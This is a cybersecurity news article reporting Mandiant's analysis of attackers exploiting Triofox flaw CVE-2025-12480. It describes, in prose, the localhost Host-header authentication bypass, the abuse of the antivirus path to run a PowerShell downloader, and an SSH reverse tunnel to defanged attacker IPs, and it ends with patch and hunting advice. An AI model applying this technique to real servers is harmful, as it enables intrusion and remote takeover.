Security Affairs
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 104|Security Affairs newsletter Round 584 by Pierluigi Paganini – INTERNATIONAL EDITION|U.S. Government Agency Paid $1M to Data Extortion Group Kairos|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 104|Security Affairs newsletter Round 584 by Pierluigi Paganini – INTERNATIONAL EDITION|U.S. Government Agency Paid $1M to Data Extortion Group Kairos|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Critical Triofox bug exploited to run malicious payloads via AV configuration

Hackers exploited Triofox flaw CVE-2025-12480 to bypass auth and install remote access tools via the platform’s antivirus feature. Google’s Mandiant researchers spotted threat actors exploiting a now-patched Triofox flaw, tracked as CVE-2025-12480 (CVSS score of 9.1) that allows them to bypass authentication to upload and run remote access tools via the platform’s antivirus feature. Mandiant […]

Triofox

Hackers exploited Triofox flaw CVE-2025-12480 to bypass auth and install remote access tools via the platform’s antivirus feature.

Google’s Mandiant researchers spotted threat actors exploiting a now-patched Triofox flaw, tracked as CVE-2025-12480 (CVSS score of 9.1) that allows them to bypass authentication to upload and run remote access tools via the platform’s antivirus feature.

Mandiant has been tracking the ongoing exploitation of the Triofox flaw CVE-2025-12480 to threat cluster UNC6485.

“As early as Aug. 24, 2025, a threat cluster tracked by Google Threat Intelligence Group (GTIG) as UNC6485 exploited the unauthenticated access vulnerability and chained it with the abuse of the built-in anti-virus feature to achieve code execution.” reads the report published by Mandiant.

Mandiant leveraged Google Security Operations to detect suspicious activity on a customer’s Triofox server involving PLINK-based RDP tunneling and file downloads to temp directories.

It’s the third Triofox bug abused this year, following CVE-2025-30406 and CVE-2025-11371. The update blocks access to configuration pages after setup, but attackers exploited unauthenticated access to create a new admin account, “Cluster Admin,” through the setup process, using it for further malicious activity across compromised systems.

Mandiant found a suspicious HTTP request showing an external source using a “localhost” host header, a circumstance suggesting an exploit. Testing showed that Triofox pages like AdminAccount.aspx and AdminDatabase.aspx should redirect to “Access Denied,” but changing the Host header to “localhost” bypassed these controls, granting access to the admin setup process and enabling creation of new admin accounts. Analysis revealed the vulnerable CanRunCriticalPage() function in GladPageUILib.dll, which grants access if the Host equals “localhost.” The flaw lets attackers fake the Host header to bypass checks, has no way to verify where requests really come from, and only relies on easily misconfigured settings for protection.

The attacker used the newly created admin account to upload and run a malicious batch via Triofox’s antivirus feature by pointing the AV path to their script, which executed with SYSTEM privileges. Uploading any file to a published share triggered the script. The batch ran a PowerShell downloader that fetched a disguised payload from http://84.200.80[.]252 (saved as C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe) and launched it silently. The payload installed Zoho UEMS, which the attacker abused to deploy Zoho Assist and AnyDesk for remote access. Attackers enumerated SMB sessions and user accounts using Zoho Assist, then tried password changes and privilege escalation (adding accounts to local admins and Domain Admins). For persistence and C2 tunneling they downloaded plink-like tools (sihosts.exe, silcon.exe) into C:\Windows\Temp and established an SSH reverse tunnel over port 433 to 216.107.136[.]46, forwarding remote RDP (127.0.0.1:3389) to the attacker-controlled host.

“While this vulnerability is patched in the Triofox version 16.7.10368.56560, Mandiant recommends upgrading to the latest release. In addition, Mandiant recommends auditing admin accounts, and verifying that Triofox’s Anti-virus Engine is not configured to execute unauthorized scripts or binaries.” concludes the report. “Security teams should also hunt for attacker tools using our hunting queries listed at the bottom of this post, and monitor for anomalous outbound SSH traffic.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Triofox)